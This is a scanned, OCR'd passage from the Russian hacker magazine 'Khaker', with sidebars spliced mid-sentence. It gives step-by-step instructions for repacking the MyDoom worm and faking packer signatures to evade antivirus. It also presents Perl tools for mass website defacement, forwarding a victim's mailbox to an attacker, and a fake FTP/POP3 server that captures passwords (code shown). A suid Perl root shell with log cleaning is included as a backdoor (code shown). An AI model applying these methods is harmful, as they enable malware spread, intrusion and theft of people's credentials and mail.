книги хакеры / журнал хакер / 072_Optimized

Упаковщик UPX можно определить на глаз

распаковки, то успешно извлечет из файла код программы и проверит его. У антивируса начинаются проблемы в том случае, когда тип упаковщика ему неизвестен. Антивирусы умеют вскрывать файлы, сжатые большинством популярных упаковщиков.

Для того чтобы попавший в базу троян или вирус перестал определяться антивирусом, необходимо либо упаковать его заново неизвестным антивирусу упаковщиком, либо затруднить или сделать невозможным определение того, чем сжат файл.

УПАКОВКА

Для опытов я взял давно присутствующий во всех антивирусных базах вирус MyDoom.e. Для проверки я использовал два антивируса, которые нашлись у меня на компьютере, - Kaspersky Anti-Virus 4.5 и Norton Anti-Virus 2002. Данный экземпляр MyDoom запакован UPX’ом - довольно известным и распространенным упаковщиком. Я определил это по названиям секций в PE-заголовке файла (UPX0 и UPX1), а также по присутствующей там строчке «1.24 UPX». Распаковать UPX не составляет труда - это позволяет делать и сама утилита upx.exe, стоит только указать ключ -d. Практически все антивирусы умеют делать это, так как разработчики UPX активно сотрудничают с компаниями, занимающимися разработками в сфере сетевой безопасности, о чем прямо упоминается в лицен-

зии программы. На самом деле распаковать файл бывает непросто. Не все программы для сжатия исполняемых файлов поддерживают распаковку. Приходится искать в интернете специальные распаковщики, которые далеко не всегда работают корректно.

После распаковки файл, конечно же, тоже

определяется антивирусом. Теперь необходимо запаковать файл таким упаковщиком, который был бы ему неизвестен. Упаковщиков в инете действительно много, и есть из чего выбрать. Для опытов я выбрал PECompact2. Этот упаковщик замечателен тем, что дает на выбор пять разных вариантов сжатия и два загрузчика. Различные способы сжатия реализованы в виде кодеков.

Я взял распакованный файл и попытался сжать его заново. Были выбраны следующие настройки упаковщика: наивысший уровень компрессии, кодек для сжатия - LZMA SDK Codec, загрузчик - стандартный. Я выбрал именно LZMA, так как именно этот алгоритм дает наименьший размер итогового файла. Высокий коэффициент сжатия достигается за счет использования того же самого алгоритма сжатия, что используется в архиваторе 7zip. По размеру сжатых файлов 7zip, как известно, иногда обгоняет даже RAR.

Вирус успешно сжался. Затем я проверил получившийся сжатый файл антивирусными программами AVP и NAV. Оба антивируса показали, что файл чист! Это говорит о том, что используемый кодек сжатия им неизвестен и ничего подозрительного в этом файле антивирусы не углядели.

После сжатия необходимо проверить вирус или троян на работоспособность, а то может получиться так, что на компьютере-жертве он просто вылетит с ошибкой. Такое иногда слу- чается со сжатыми файлами. Разумеется, за-

Помни, что любые действия по распространению вредоносных программ караются Уголовным кодексом РФ. Не следует нарушать законы страны, в которой ты живешь.

На нашем диске, как всегда, ты найдешь весь упомянутый в статье софт.

МАСКИРОВКА

Для повышения защиты от детектирования антивирусом нужно применить дополнительные меры по маскировке. Можно вообще не переупаковывать файл, а попытаться скрыть от антивируса информацию о том, чем на самом деле бинарник сжат. Допустим, вирус сжат обычным UPX. Если антивирус не будет об этом знать, то не сможет найти подходящий способ распаковки. Защитить программу от определения типа компилятора и упаковщика, использованного для ее создания, позволяет модификация точки входа. Эту процедуру можно выполнить с помощью специальных утилит, таких как, например, HidePE. С помощью этой программы можно сделать так, чтобы файлы, упакованные, например, с помощью UPX, определялись как упакованные ASProtect или VBOX. После обработки этой программой вируса Mydoom.e ни Kaspersky, ни Norton не смогли его определить. От разработчиков HidePE доступна еще одна подобная программа - StealthPE. Она отличается более богатым набором инструментов для скрытия информации о типе упаковщика. Среди таких программ от других разработчи- ков следует упомянуть о DotFix FakeSigner, которая предлагает на выбор более 200 различных сигнатур компиляторов и упаковщиков для внедрения в программу.

ВОЗМОЖНЫЕ ПРОБЛЕМЫ

В реальной ситуации с распаковкой и упаковкой программ может возникнуть куча проблем. Например, есть троян, но неизвестно, чем он упакован. Можно попытаться использовать одну из специальных утилит, например PEiDentfier или PE Sniffer из PE Tools. Если эти программы не дали тебе необходимой информации, тогда можно попытаться определить на глаз. Разработчи- ки упаковщиков любят вставлять названия своих программ в обработанные файлы. Так что если в начале файла найден заголовок «FSG», то, скорее всего это файл, сжатый именно FSG. Допустим, известно, чем упакован файл, но этот упаковщик не поддерживает распаковку. Можно не беспокоиться, умные люди наверняка давно написали распаковщик именно для этой программы. Как говорит разработчик UPX: «Just do a websearch on "unpackers"». Любой алгоритм упаковки можно сломать, просто некоторые алгоритмы ломаются на лету, а некоторые требуют специального подхода и недюжинных знаний в программировании на ассемблере.

ЧТО В ИТОГЕ

Что можно сделать с помощью этих несложных процедур? Много чего. Спровоцировать новую вирусную эпидемию, взяв известный вирус и наделав из него пять новых разновидностей. Поставить троян на машину человека, который может хоть каждый день сканировать свой жесткий диск антивирусным сканером и ничего не обнаруживать. Всеми этими способами успешно пользуются разработчики программного обеспечения для защиты своих творений от взлома. Крэки все равно рано или поздно появляются, но хорошая защита исполняемого файла может как минимум задержать этот процесс. На пару деньков. Не проспи Новый год, удачи! :)

НУЖНЫЙ СОФТ

Если интересно повторить мой эксперимент, то потребуется софт, который я упоминал в этой статье:

HidePE, StealthPE http://bgcorp.narod.ru

DotFix FakeSigner www.dotfix.com

UPX 1.90w http://upx.sf.net FSG 2.0 www.xtreeme.prv.pl

PE Compact 2.10 www.bitsum.com PE Tools/PE Sniffer www.uinc.ru

Как всегда, этот софт можно найти на нашем диске, а также на сайте http://ired.inins.ru/xa.

ПРОСТЫЕ СОВЕТЫ

Попробуй запаковать файл разными программами с различными алгоритмами сжатия - результат работы будет разнообразным. Какая-то из софтин сожмет твой бинарник в 10 раз, но он банально не запустится. Какая-то сожмет на 30%, обеспечив стабильную работу до проверки антивирусом. Но ты выберешь ту, что уменьшила размер твоего чудо-бинарни- ка вдвое, а вероятность нелепого конфликта с антивирусом свела к нулю. Также ты можешь просто вставить в свою программу сигнатуры других программ для сжатия, что окончательно запутает глупые антивирусы. z

А ВОТ ЭТО МОЙ РАЗМЕРЧИК!

Мне часто приходится прибегать к рутинной процедуре поиска файлов определенного формата. Но помимо расширения, меня интересует и размер документа. К примеру, я не хочу скачивать документы, которые имеют размер менее семисот килобайт. В системной функции find есть опция -size, однако она задает лишь фиксированное число, что крайне неудобно.

Все эти накладки заставили меня написать простенький скрипт, который ищет все необходимые документы, а затем составляет список файлов определенного размера. Вес документа передается сценарию в качестве первого параметра. Вторая и третья опции отвечают за маску поиска и путь соответственно.

Главный минус моего творения - медленная работа. Первым делом скрипт вызывает find, ищущий нужные доки с последующей записью местоположения файла во временный журнал. Затем этот лог открывается и тщательно анализируется. Если размер найденного файла достигает заданного, информация переносится в другой лог. Таким образом, после завершения работы сценария получается список документов, подпадающих под все нужные условия.

Никто не запрещает сдружить find.pl и locate, с последующим запросом размера на каждый найденный файл. После такого нововведения скорость работы сценария возрастет в несколько раз. Правда, редко где можно встретить функционирующий бинарник /usr/bin/locate :(.

ДЕФЕЙСИМ ВСЕ И ВСЯ

В позапрошлом номере (10/2004) я рассказывал о том, как правильно дефейсить сайты. Однако я почти ничего не сказал про масс-дефейс. Бывает, что по счастливой случайности можно получить абсолютные права на каком-нибудь хостинге. Чтобы задефейсить несколько сотен сайтов вручную, требуется несколько часов. Гораздо проще запустить скрипт, который за минуту справится с поставленной задачей.

Прежде чем автоматизировать процесс, составляется текст дефейса и сохраняется в файле deface.txt. Затем надо хорошо подумать над вопросом: нужно ли бэкапить ори-

Поиск увесистых архивов

Я несколько раз говорил в статье, что перловый код можно скомпилировать в готовый бинарник. Это довольно удобно, хотя обычно генерируется здоровенный неподъемный файл - значительно рациональнее просто переписать эти программки на C и собрать нормальным компилятором.

Весь софт из «Взлома» ты можешь найти и на сайте http://ired. inins.ru/xa/

гинальный index.html? Если нужно (а так делают многие дефейсеры), то открывается файл mass.pl и в нем меняется значение переменной $backup. Теперь нужно выбрать файлы, внутренности которых будут заменены хакерским текстом. Можно подвергнуть изменению как документы index.html, так и все файлы, подпадающие под маску index.*. Когда выбор сделан, стартуется mass.pl с параметрами deface.txt маска_дефейса. Во время процесса дефейса скрипт будет отчи- тываться по каждому замененному файлу. Если такой отчет не нужен, то нужно обнулить переменнаю $debug в коде сценария.

ХАКЕРСКОЕ ПИСЬМО

Кажется, что все мои скрипты ориентированы исключительно на атаки unix-серверов. Но это не так, для бажной винды у меня тоже кое-что имеется. Предположим, что необходимо отправить письмо с захваченной машины. Но также прекрасно известно, что в винде нет аналога линуксовой команды mail. В связи с этим был написан небольшой скрипт, который шлет необходимое письмо от произвольного отправителя. Единственное условие, которое необходимо выполнить, - найти SMTP-сервер, принимающий письма со взломанной машины.

Сценарий не использует никаких модулей типа Net::SMTP. Практика показывает, что подобные библиотеки изначально отсутствуют на виндовой тачке. С помощью обычного сокета скрипт соединяется с SMTP-серве- ром и посылает ему необходимые данные. Текст хакерского письма должен быть предварительно записан в файл letter.txt. Вся остальная информация (тема, отправитель, получатель) занесена внутрь smtp.pl.

К сожалению, на некоторых виндовых серверах может отсутствовать эмулятор Perl. Если это так, используй средство Perl2Exe для создания исполняемого файла smtp.exe, который будет гарантированно работать в любых условиях.

ПЕРЕКИДЫВАЕМ ПОЧТУ

Представь ситуацию: хакер завладел ящиком какого-нибудь богатого иностранца и желает познакомиться с его почтовой корреспонденцией. Но для того чтобы почи- тать входящие письма, необходимо найти хороший прокси-сервер и каким-то образом их сохранить. Ррадикальный метод разрешения всех проблем - использование скрипта, скачивающего все письма с одного ящика с последующей их отсылкой на другой. Сценарий может решить все проблемы сразу. Ясен пень, что запускать перловый скрипт нужно с далекого буржуйского шелла.

Способности редиректора

sub usage {

print "Usage: $0 [options]...\n"; print "Options are:

-f: Hostname of pop3 server -u: Username for login

-p: Password for login

-t: Hostname of smtp server -s: Default subject (if none)

-m: Md5 authorization (disabled by default) -d: Delete ALL messages after redirecting -h: This help\n";

exit

}

Процедура usage() сразу раскрывает все возможности сценария. Во-первых, скрипт умеет принимать параметры smtp и pop3 сервера прямо из командной строки. Во-вторых, редиректор может авторизоваться защищенным методом, в результате которого все сниферы пойдут лесом. И в-третьих, сценарий способен удалить все сообщения после их отсылки на хакерский ящик. Эту фичу следует юзать с особой осторожностью.

Надо заметить, что мое творение использует в работе модуль Net::POP3. Он не поставляется по дефолту, поэтому требует дополнительной установки. Чтобы заинсталлить пакет, нужно выполнить команду perl - MCPAN -e install Net::POP3.

ОТЛАВЛИВАЕМ ПАРОЛИ

Если ты думаешь, что я буду рекламировать самопальный снифер, ты ошибаешься. Слу-

чается, что хакер перехватывает конфигурационный файл какого-нибудь FTPили поч- тового клиента. Теперь его задача - отловить пароль на почту либо файловый архив. Для выполнения задуманного можно прибегнуть к программам типа openpass или recover, но не факт, что они дадут желаемый результат. Для альтернативного решения задачи можно применить мой скрипт, прослушивающий порт и полностью эмулирующий сервис. При этом сценарий общается с клиентом, выполняя функцию рабочего сервиса.

В комплекте со сценарием идут два текстовых файла. В первом изложены ответы на команды при работе с FTP, а во втором - при POP3 аутентификации. В зависимости от протокола, надо создать файл rfc.txt и положить его в каталог со скриптом. Затем запускается сценарий из командного интерпретатора (чтобы окошко не закрылось раньше времени) и травится клиент на локальный хост. Глупая программа, ничего не подозревая, соединится с фэйковым сервисом и передаст ему драгоценный пароль. Он сразу виден при выводе сценария.

Эмуляция сервиса

while($client=$sock->accept()) { # Когда соединение произошло

while(1) { # Организуем бесконечный цикл $rfc[$i]=~s/\n/\r\n/; # Добавляем символ перевода каретки в фейковый ответ сервиса

$client->send("$rfc[$i]"); # И шлем его клиенту print "=>: $rfc[$i]"; # Дублируем в консоли $i++;

$stat=$client->recv($data,1024); # Читаем данные из сокета print "<=: $data\n";

if ($i eq $count || $data=~/quit/i) { # Если в данных содержится QUIT или больше нет ответов

print "END OF DATA (EOF rfc or quit)\n"; close($client); # Закрываем сокет и выходим exit;

}}}

Для совместимости с клиентами проводится введение дополнительного символа возврата каретки. После соединения с поч- товиком выводится поддельный баннер, а затем читается имя пользователя. Точно так же принимается пароль и остальные команды. Если в файле с реакционными фразами более ничего нет, соединение закрывается. Закрытие сокета происходит также в случае получения слова QUIT.

РУТОВЫЙ ШЕЛЛ ЗА ДВЕ МИНУТЫ

Часто бывает, что на взломанной машине напрочь отсутствует компилятор. При таком

ужасном раскладе хакеру не удается скомпилировать руткит, логвайпер и даже бэкдор! Чтобы решить эту проблему, достаточно обратиться за помощью к перловому интерпретатору. Не буду тянуть резину, а сразу скажу, что мне приходит много писем с вопросом организации суидных приложений на Perl. То есть, попросту, взломщик хочет выполнять команды суперпользователя через обычный перловый скрипт. Этого добиться не просто, а очень просто :).

Не секрет, что суидные скрипты обрабатываются специальным интерпретатором /usr/bin/suidperl. Но вот западло: перед выполнением сценария suidperl всячески проверяет его на предмет наличия опасных команд. То есть при обычных условиях интерпретатор обойдет стороной подозрительную функцию system(). Чтобы отключить эту проверку, необходимо использовать параметр -U, указанный в заголовке сценария. А дальше дело техники: организуется бесконечный цикл, в котором происходит запрос команды. В итоге получится что-то типа суидного /bin/bash. В довесок ко всему этому можно добавить ряд нехитрых команд, которые запускают портированный логклинер и прячут хакерские процессы.

Суидная оболочка

#!/usr/bin/suidperl -U

system("/usr/bin/checklogs dummy"); # Запускаем портированный логклинер

while(1) {

print "rootcmd# "; # Выводим приглашение в бесконечном цикле

$cmd=<>; chomp($cmd); $out=`$cmd`;

print $out; # А также результат обработанной команды

}

Все чисто! На сервере только легальные процессы

Также надо не забыть установить на сценарий suid-бит и припрятать его в укромное место, обозвав невзрачным именем. А еще лучше, скомпилировать хакерское творение программой perlcc, и тогда админ никогда не догадается, что на его машине поселились злые хакеры.

СКРЫТЫЕ ПРОЦЕССЫ ПОД ХАКЕРСКИМ ВЗОРОМ

И последний сценарий. Я написал его, когда проводил аудит своей системы. Чудесный скрипт отображает процессы, которые скрываются от утилиты /bin/ps. Он очень пригодился мне и в хакерской жизни: я запускаю ps.pl на всех взломанных машинах, дабы убедиться в том, что кроме меня машину никто не порутал. Хакеру и администратору в одном лице никто не мешает доработать сценарий (добавить e-mail-оповещение) и запускать его crontab'ом каждые три часа. Можно использовать скрипт в качестве проверки эффективности руткита (большинство нормальных LKM позволяют облапошить этот сценарий). В общем, применений ps.pl может быть несколько, однако не следует слишком доверять этой программе :).